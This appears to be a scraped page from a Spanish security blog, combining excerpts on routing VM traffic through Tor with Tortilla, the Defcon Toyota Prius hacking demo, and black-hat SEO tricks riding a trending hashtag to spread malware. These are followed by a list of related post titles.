A continuación configuramos la máquina virtual para utilizar el nuevo adaptador de Tortilla. En el caso de VMWare simplemente basta con añadir o editar una red VMNet y puentearla al adaptador de Tortilla:

Web de la herramienta:https://github.com/CrowdStrike/Tortilla

Últimamente está habiendo mucha controversia con todo lo que rodea al hacking de automóviles, sobre todo después de las esperadísimas charlas que dieron Zoz (en la foto) y Charlie Miller y Chris Valasek en la última conferencia de la Defcon en Las Vegas. Y no es para menos... en el siguiente vídeo Charlie y Chris se montan en el asiento trasero de un Toyota Prius y demuestran a su conductor, Andy Greenberg de Forbes, que son capaces de causar una serie de eventos, algunos de ellos muy peligrosos y que podrían causar un grave accidente...

El Prius tiene 35 unidades de control electrónico (ECU) y casi cada una de ellas tiene su propia función. Comprometiendo estos sistemas de forma individual se puede manipular el coche, normalmente haciéndole creer que un accidente está ocurriendo. Por ejemplo, los cinturones de seguridad pueden apretarse mediante el sistema de pre-colisión del vehículo, pueden mover el volante de forma repentina a un lado mediante la activación de la ayuda al estacionamiento automático o incluso desactivar por completo los frenos. Es decir, no hablamos sólo de tocar de forma automática el claxon o de subir el cristal de una ventanilla, esto es serio señores...

Relacionado:
Car hackers use laptop to control standard car
Hackers demonstrate Toyota Prius hijacking on video
Your Car Can Be Hacked And Here's What It Might Look Like: Video
Car Hacking: Here’s Code, Have at It
Car hacking code released at Defcon

RT: ‏@Proscojoncio #LasTetasDeRajoy.
Primer titular que pensaron en ABC
tras elegir la foto para su portada

Hoy tenemos en Twitter el TT #LasTetasDeRajoy y todo por una "desafortunada" portada del ABC en la que se muestra una imagen del presidente en pleno footing haciendo gala de unos prominentes... pechos XD. A partir de ahí imaginaros el cachondeo y sobretodo la cantidad de mensajes circulando ahora mismo por la Red...

Pero no todo es guasa, imaginad la oportunidad que significa para un spammer o, aún peor, para un atacante mal intencionado que se aprovecha de una tendencia para publicar ante una numerosa audiencia alguno de sus enlaces maliciosos.

Seguro que ya los habréis visto en más de una ocasión aprovechando alguna noticia de gran repercusión para colarse en los primeros puestos del buscador y ofrecer gentilmente su malware pero, ¿cómo lo hacen? Pues básicamente mediante el uso de técnicas no éticas de posicionamiento o Black Hat SEO como:

- La copia o duplicidad de contenidos, tanto si es una copia exacta como si en la copia se realizan ciertas modificaciones.
- La publicación de comentarios spam en otros blogs o foros.
- Las granjas de enlaces que ayudan a mejorar el PageRank de una página al redireccionar una serie de enlaces hacia esa web.
- Las páginas traseras que tienen como misión la creación de contenido para generar tráfico y enlaces que apunten a la página del cliente.
- Texto oculto en el mismo fondo que la web o blog para que el buscador lo interprete sin que el usuario lo reconozca.
- Cloaking para mostrar un contenido diferente a los usuarios (texto) y a los robots (código html).
- Compra de dominios caducados que aún conservan cierta reputación y posicionamiento.
etc.

Todas estas técnicas están normalmente penalizadas por los buscadores como Google que pueden incluso bannearlas con la misma rapidez con la que se han posicionado arriba. El resultado: un éxito efímero en la que una página se ha podido posicionar muy bien y muy deprisa pero sólo durante un breve periodo de tiempo.

Oh wait! perfecto para servir malware, no? Pues eso.

Cómo llamar por teléfono conservando la privacidad con Redphone

Ventanas a la red

CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

Grave vulnerabilidad en Android permite modificar las aplicaciones sin cambiar su firma

Javapocalipsis: ¿qué pasaría si Java fuera "apagado" de repente?

Introducción a Karmetasploit

Las #CuentasDelPP filtradas, café y un análisis pendiente

Curso gratuito de preparación para el CISSP valorado en 3000 euros

Hora de parchear el bug 8219321 de Android (master keys)

Libro: Worm: The First Digital World War

Android incorpora código de la NSA desde 2011

Grampus: una herramienta multiplataforma de extracción de metadatos y footprinting

Solución al reto 17 de Toulouse

Cómo usar Google como servidor proxy

Janicab.A y el truco del carácter U+202E

Utilizan exploit para el navegador de Tor contra la pornografía infantil (y contra el anonimato de los usuarios de Tor)

BREACH o cómo romper HTTPS en sólo 30 segundos

Enruta todo el tráfico de tu máquina virtual por Tor con Tortilla

Hackers demuestran en video como manipulan un Toyota Prius

Black hat SEO y #LasTetasDeRajoy